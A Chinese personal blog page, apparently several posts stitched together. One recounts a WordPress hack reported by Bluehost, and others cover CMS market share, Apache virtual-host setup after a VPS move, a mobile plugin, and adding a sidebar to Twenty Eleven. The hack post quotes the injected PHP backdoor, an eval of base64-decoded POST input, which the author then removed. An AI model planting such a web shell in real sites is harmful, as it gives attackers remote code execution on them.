早上起来收到bluehost的邮件,称我的帐户里面有恶意代码,都是针对wordpress,并且列举如下:
<?php if ($_POST["php"]){eval ( base64_decode($_POST["php"]));exit;} ?>
eval ( base64_decode($_POST["php"]));
<?php eval ( base64_decode("balabala……balabala")); //这段之所以有简略和增加空格是因为怕被防火墙ban掉
查看了一下文件,发现是在有些php文件的头部分加入了这个东西,这个东西之前并没有看到,删掉之后也没有什么影响。
一直没有很重视安全这一块,如今终于被黑,算是寡人踏入本领域的一个标志性事件吧。
晚上心血来潮想看看相关的东西,搜到这个报告,连续做了几年,算是比较公允和权威的。
市场上三巨头仍然是wordpress, joomla, drupal,wordpress在业界是当之无愧的领导者。
Concrete5在去年异军突起,成长很快,当然这个很傻瓜,几乎称不上是cms。
Joomla下滑严重,前景堪忧,其实我很不看好Joomla,主要是第三方插件支援的问题,环境很恶劣,更新慢,免费少收费多。
报告有62页,但是图表居多。
我比较喜欢Drupal,虽然很复杂,但是前景很好,社区环境也很不错,但是我这种菜鸟其实wordpress就足够了。
昨天明明写了一段“网站迁移至AWS”,今天上来看发现没了,就知道昨天八成还是导向到Bluehost,后面才是真的导向到日本。
wordpress迁移之后遇到三个小问题:
1、域名的设置方面,原来我的设置是
ServerAdmin xxx@gmail.com DocumentRoot /var/www/html/xxx ServerName xxx.com ErrorLog logs/xxx-error_log CustomLog logs/xxx-access_log common
后来发现这样设置的话,输入www不会指向xxx,而是会指向httpd.conf里面设置在最前面的网站,解决办法:在servername下面添加一行
ServerAlias www.xxx.com //或者*.xxx.com,不过我的子域名大多有用
这样子的话,输入www或者其他前缀也能指向正确的网站 继续阅读WordPress虚拟主机迁移至VPS的几个问题
这款插件的作用就是将你的博客转为手机版,方便移动设备阅读。之前也有用过其他的手机浏览插件,但是要么收费,要么就是版面设计差强人意,mobilepress是我目前遇到的最顺眼的插件,特此推荐。
上图:
最近奋斗博客换成了WordPress 默认主题 Twenty Eleven 。Twenty Eleven 的最大优点就是加载速度快,而且兼容性很好。
但Twenty Eleven文章页面不支持侧边栏,我们需要手动为WordPress 默认主题 Twenty Eleven 添加侧边栏。
步骤如下:
1.打开single.php,在末尾找到<?php get_footer(); ?>,在其前一行添加<?php get_sidebar(); ?>,保存。(修改single.php可以在单篇日志页面添加侧边栏,同样可以在其他页面添加)